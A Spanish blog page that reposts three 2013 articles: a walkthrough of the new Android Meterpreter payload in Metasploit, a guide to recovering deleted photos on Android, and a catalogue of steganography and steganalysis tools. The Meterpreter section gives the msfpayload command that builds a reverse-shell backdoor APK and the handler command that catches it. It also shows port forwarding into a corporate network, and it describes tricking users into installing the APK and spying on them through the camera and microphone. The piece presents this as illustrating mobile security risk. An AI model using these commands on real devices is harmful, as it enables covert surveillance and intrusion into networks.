martes, 25 de junio de 2013

Nuevo meterpreter para android,

 Hace ya una buena temporada que venía haciendo un "marcaje de cerca" a ESTE "Pull Request" que existía en el GitHub sobre una iniciativa para portar el Meterpreter Java para Android, que aunque pueda parecer trivial porque las aplicaciones de Android se programan en Java, no es exactamente portable el Java "habitual" que el Java para la máquina virtual Dalvik que tenemos en nuestros Android.
Durante este tiempo he ido bajándome el fork de Metasploit de timwr, que ha sido una de las personas que más han contribuido en esta nueva versión del Meterpreter, y la verdad es que lleva tiempo siendo bastante estable, salvo algún error que me encontré que tuve que arreglar desempaquetando el APK, modificando alguna cosa y volviéndolo a empaquetar para su uso.
Finalmente, después de mucha espera, hoy mismo he visto que se ha hecho un commit de esta funcinalidad hace unos pocos días, por lo que en teoría ya tenéis la funcionalidad en el fork principal de Metasploit. Vamos a ver si es verdad:

$ ./msfupdate 
[*]
[*] Attempting to update the Metasploit Framework...
[*]

[...]
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Meterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Shell.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/androidpayload/stage/Stage.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_fs_file_expand_path_android.java
 create mode 100644 external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/stdapi_sys_process_get_processes_android.java


La cosa pinta bien ¿no? Sí que parece que hay ficheros que nos hacen pensar que la funcionalidad del nuevo Meterpreter para Android ha sido incorporada. Vamos a ver la ayuda de msfpayload, a ver si confirma nuestra teoría:

$ ./msfpayload -l | grep -i android
    android/meterpreter/reverse_tcp                  Connect back stager, Run a meterpreter server on Android
    android/shell/reverse_tcp                        Connect back stager, Spawn a piped command shell (sh)


¡Genial! Parece que se acabó eso de tener que instalar dos forks de Metasploit, uno el estandar y el otro con esta funcionalidad. Vamos a generar un APK con un Meterpreter con reverse shell, a ver si conseguimos que alguien se lo instale y jugamos un poco con él :)

$ ./msfpayload android/meterpreter/reverse_tcp LHOST=11.22.33.44 R > meter.apk


Tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos saca el APK. Veámoslo:

$ file meter.apk 
meter.apk: Zip archive data, at least v2.0 to extract


Nos dice que es un ZIP, pero es que en realidad un fichero APK no es más que un ZIP que contiene una serie de ficheros con un formato determinado. Ahora solo tenemos que instalar la aplicación en un Android, generalmente con algún tipo de engaño. Este APK es más bien una prueba de concepto, porque viene con un icono azul de Metasploit, pero podría esconderse el mismo código en una aplicación que "diera el pego" y el efecto sería el mismo. Al arrancar la aplicación se recibe la conexión inversa.


$ ./msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=0.0.0.0 E




Ya hemos comprobado que el Meterpreter para Android, funcionar funciona, pero lo que no sabemos es que funcionalidades tiene. Evidentemente, como sucede en las versiones Java y Linux, la funcionalidad es mucho más reducida que en la versión para Windows, pero aún así hay funcionalidades muy interesantes que nos pueden servir para ilustrar los riesgos de seguridad de un dispositivo móvil. Por ejemplo, viene con funcionalidad para realizar fotografías empleando tanto la cámara delantera como la trasera, si estuviera disponible. Otra funcionalidad que me pareció extremadamente interesante fue la posibilidad de activar el micrófono y usar el terminal como un micro oculto. Esta no conseguí hacerla funcionar en el teléfono que lo probé, pero supongo que poco a poco irán puliendo estos detalles.




Imagínatelo, comprometer un terminal móvil y poder escuchar y ver por donde va el usuario. Sin duda un gran trabajo de la gente que ha contribuido con este módulo y de la gente de Rapid7 al ayudar a su integración en Metasploit.
Otra de las funcionalidades que pueden impresionar menos a nivel mediático, pero que resultan muy peligroso a nivel corporativo, es la posibilidad de hacer port-relaying desde el terminal móvil. Digo que interesa a nivel corporativo porque, a un usuario "de casa", no se saca nada haciendo un port-relay, pero en una empresa... ¿qué ocurre si hacemos esto cuando el usuario tiene levantada la VPN que le da acceso a la red interna de la empresa?

meterpreter> portfwd add -l 80 -r 192.168.100.10 -p 80
[*] Local TCP relay created: 0.0.0.0:80 <-> 192.168.100.10:80


Lo dicho, un gran trabajo de la colaboración de la comunidad y del equipo de desarrollo de Metasploit que seguro que nos va a dar mucho juego.

Fuente:http://www.pentester.es/2013/05/nuevo-meterpreter-para-android.html

Recupera tus fotografías, vídeos y canciones eliminadas o borradas de tu Android

A woman's finger hovering over the delete key

Estos dos métodos solamente valen en terminales con almacenamiento externo, es decir, no podemos recuperar fotos, vídeos, canciones o contactos en dispositivos que solamente tengan memoria interna.
Aunque suene a película policíaca, cuando alguna fotografía ha sido eliminada en un smartphone o tablet con sistema operativo Android, puede recuperarse siempre y cuando el soporte de almacenamiento no haya sufrido daños físicos. ¿No te he pasado alguna vez, que sin querer has borrado alguna instantánea y has deseado poder hacer esto? Pues, a continuación, os explicamos cómo podéis recuperarlas.
Para citada finalidad existen dos métodos. Uno de ellos, el primero, está especialmente orientado para smartphones o tablets del fabricante coreano Samsung. Si vuestro dispositivo no es de esta marca, probablemente también sea compatible y sino podéis emplear el segundo método, que pasaremos a llamar “método universal”.

Método primero (Wondershare Dr.Fone)

Antes de nada, debéis saber que vuestro smartphone o tablet debe tener permisos Root para poder llevar a cabo el proceso de recuperación. Puedes leer más sobre ROOT aquí.
Con la herramienta que voy a presentar a continuación, además de fotografías, podemos recuperar mensajes, contactos y vídeos. Para que sea más llevadero, expondré el tema a modo de tutorial, por pasos.
  1. Lo primero de todo es descargar la herramienta para nuestro ordenador. En el caso de esta primera herramienta, sólo podremos descargarla para ordenadores con sistema operativo Windows y podéis hacerlo solamente con seguir este enlace.
  2. Ahora que ya hemos descargado Wondershar Dr.Fone, tenemos que activar la depuración USB y conectar el dispositivo a nuestro ordenador mediante USB.drfone-android-usb-debugging
  3. Acepta, en el programa, el escaneo de tu dispositivo.
  4. Una vez ha sido escaneado el dispositivo, se mostrará una galería de fotografías recuperadas. Ahora, las que quieras recuperar, puedes seleccionarlas y almacenarlas en cualquier parte de tu ordenador.samsung-android-device02

Método “universal” (Wondershare Photo Recovery)

Ahora sí que sí. Lo cierto es que si alguien se ve con la necesidad de usar el método anterior, existen maneras de, en Mac, abrir programas para Windows pero, desde luego que es más cómodo si el programa es directamente compatible con tu sistema operativo. Si tu ordenador tiene Windows, este vínculo es el tuyo, pero si usas Mac, no dudes en hacer click aquí.
Con este programa podremos recuperar también vídeos y canciones. Es necesario añadir, que no solamente podremos recuperar este tipo de archivos de nuestro dispositivo Android sino que también podemos usar el programa para otros dispositivos como cámaras de foto o vídeo entre muchos otros.
  1. Ya sabes, antes que nada descárgate el programa en cuestión. Si ya lo tienes continúa leyendo y si necesitas descargarlo puedes utilizar estos links: WindowsMac.
  2. Como con el otro programa, comenzaremos conectando el dispositivo a nuestro ordenador mediante el cable USB.
  3. A continuación, tendremos que aceptar el inicio de un escáner que nos llevará a encontrar en nuestro smartphone o tablet aquellas fotografías que hayamos eliminado anteriormente.portable-device-recovery
  4. Después del proceso anterior se nos mostrarán las fotografías recuperadas y podremos seleccionar las que queramos guardar de nuevo, las que no, podemos desecharlas.select-files

Útiles, muy útiles

Como decía al comienzo de este artículo, muchas veces hemos borrado por error alguna fotografía, canción o vídeo de nuestro dispositivo y da mucha rabia. Seguro que más de uno habrá pensado por qué no existiría este tipo de aplicación o programa.
No cabe lugar a duda que se trata de un programa extremadamente útil el cual más de uno descargaréis corriendo según vayáis leyendo las líneas de este post. De hecho, ¿llegaréis a leer esto mismo que escribo?

Disfrutad de este programa y, si tenéis tiempo entre foto y foto recuperada, podéis dejarnos vuestra opinión en un comentario.

Fuente:http://www.elandroidelibre.com/2013/06/recupera-tus-fotografias-videos-y-canciones-eliminadas-o-borradas-de-tu-android.html

viernes, 14 de junio de 2013

Recopilatorio de herramientas de esteganografía y estegoanálisis


Gracias a un paper de Pedram Hayati podemos recopilar hasta un total de 111 herramientas de esteganografía y estegoanálisis clasificadas por categorías.

Según su autor, el estudio se realizó desde un perspectiva forense para identificar qué herramientas están disponibles en Internet y cuáles de ellas podrían ser utilizadas por organizaciones terroristas. Sea como fuere, es un excelente recurso para tener siempre a mano un listado de estas herramientas:

Herramientas de esteganografía en imágenes con código fuente disponible

Steganographic
Tools
JPEG BMP Others Embedding
Aproach
Production
Blindside
Yes
SDS Yes
Camera Shy Yes

SDS Yes
dc-Steganograph

PCX TDS
F5 Yes Yes GIF TDS Yes
Gif Shuffle

GIF Change
the order of the color map
Yes
Hide4PGP
Yes
SDS Yes
JP Hide and
Seek
Yes

SDS Yes
Jsteg Jpeg Yes

SDS Yes
Mandelsteg

GIF SDS Yes
OutGuess Yes
PNG TDS Yes
PGM Stealth

PGM
Yes
Steghide
Yes
SDS Yes
wbStego
Yes
SDS Yes
WnStorm

PCX
Yes
SYND(E)Yes

SDSYes
TDS - Transform Domain Steganography
SDS - Spatial Domain Steganography (LSB Replacement and LSB Matching)

Herramientas de esteganografía en imágenes sin código fuente disponible

Image
Steganographic Tools
BMP JPEG GIF PNG TGA Other Production License
Crypto123 Yes Yes



Yes S
Hermetic Stego Yes




Yes S
IBM DLS Yes Yes Yes Yes

Yes S
Invisible
Secrets
Yes Yes
Yes

Yes S
Info Stego Yes Yes Yes


Yes S
Syscop
Yes



Yes S
StegMark Yes Yes Yes Yes Yes TIF Yes S
Cloak Yes





S
Contraband
Hell
Yes




Yes F
Contraband Yes




Yes F
Dound Yes




Yes F
Gif it Up

Yes


Yes F
Camouflage


Yes Yes
Yes F
Hide and Seek Yes
Yes


Yes F
InThePicture Yes




Yes F
S-Tools Yes




Yes F
Jpegx
Yes



Yes F
Steganos Yes



DIB Yes F
BMP Secrets Yes






DCT-Steg
Yes





Digital
Picture Envelope
Yes






EikonAmark
Yes





Empty Pic

Yes




Encrypt Pic Yes






EzStego

Yes




BMP Embed Yes






BMPTable Yes






StegoTif



Yes TIF

Hide Unhide




TIF

In Plain View Yes






Invisible
Encryption


Yes




JK-PGS




PPM

Scytale




PCX

appendX
Yes Yes Yes



S – Shareware License
F – Freeware License
Herramientas de esteganografía en audio

Audio
Steganographic Tools
MP3 WAV Others Production License
Info Stego Yes

Yes Shareware
ScramDisk
Yes
Yes Shareware
MP3Stego Yes

Yes Open Source
StegoWav
Yes
Yes Open Source
Hide4PGP Yes
VOC Yes Open Source
Steghide
Yes AU Yes Open Source
S-Tool
Yes
Yes Open Source
Invisible
Secrets

Yes
Yes Commercial
Paranoid

Yes Yes Commercial
Steganos
Yes VOC Yes Commercial
Herramientas de esteganografía en texto

Text
Steganographic Tools
Plain Text Other Source Code License Production
PGPn123
Yes
Shareware Yes
Nicetext Yes
Yes Open Source Yes
Snow Yes
Yes Open Source Yes
Texto Yes
Yes Open Source Yes
Sam's Big Play
Maker
Yes
Yes Open Source Yes
Steganosaurus Yes
Yes Open Source Yes
FFEncode Yes

Open Source Yes
Mimic Yes

Open Source Yes
wbStego Yes HTML. PDF Yes Open Source Yes
Spam Mimic Yes

Not Specified Yes
Secret Space Yes

Not Specified Yes
WitnesSoft Yes Yes
No longer in
production
Yes
MergeStreams
Hides excel file in
word

Freeware Yes
Steganos Yes HTML
Commercial Yes
Invisible
Secrets

HTML
Commercial Yes
StelinYes
YesGNUNo
StegoSenseYes

GNUYes
Fuse
PDFYesFreewareYes
StegB64.pyYesbinYesFreewareYes
HorrografiaYes

FreewareYes
Herramientas de esteganografía para sistemas de ficheros y discos duros

File
System Steganographic Tools
Location of
Embedding
Source Code License Production
Disk Hide Windows Registry No
No
Drive Hider Windows Registry No
No
Easy File & Folder Protector VXD driver, Windows
Kernel
No Shareware Yes
Invisible
Files 2000
Hard Disk No Shareware Yes
Magic Foders File System No Shareware Yes
Dark Files File System No Shareware Yes
bProtected
2000
File System No Shareware Yes
BuryBury File System No Shareware Yes
StegFS File System Yes Open Source Yes
Folder Guard
Jr
File System No Freeware Yes
Dmagic File System No Freeware Yes
BackYard File System No
No
Snowdisk Disk Space No
No
Masker Any
file (Image, Text, Audio, Video)
No Shareware Yes
Anahtar 3.5-inch diskette No
No
Hide Folders
No Shareware Yes
Hidden
No
No
Paranoid
No
No
Diskhide
No
No
Otras herramientas de esteganografía

Miscellaneous
Steganographic Tools
Cover Media Source Code License
GZSteg .gz files

InfoStego Image, audio, video
Shareware
KPK File Word, BMP
Shareware
S-Mail .exe and .dll files

Hiderman Many different media
Shareware
StegMark Image, audio, video

Steghide JPEG, BMP, WAV, AU Yes
S-Tools BMP, GIF, WAV Not sure
Hydan Program Binaries Yes Open Source
Covert.tcp TCP/IP Packets Yes Open Source
Herramientas de estegoanálisis

Hard Disk
Steganographic Tools
Tools Analyzed Detection
Approach
Extraction
Approach
Destruction
Approach
2Mosaic Removes
stego content from any images


Break
Apart
StirMark Benchmark Removes
stego content from any images


Resample
Phototile Removes
stego content from any images


Break
Apart
Steganography Analyzer Real-Time Scanner Analyzes
Network Packets
Signature

StegBreak Jsteg-shell,
JPhide, and Outguess 0.13b

Dictionary
StegDetect Jsteg,
JPhide, Invisible Secrets, Outguess 01.3b, F5, appendX, Camouflage
Statistical

StegSpy Hiderman,
JPHIde and Seek, Masker, JPegX, Invisible Secrets



Stego-Suite Detects
Stego Image and Audio file

Dictionary
Fuente: http://www.hackplayers.com/2011/12/recopilatorio-de-herramientas-de.html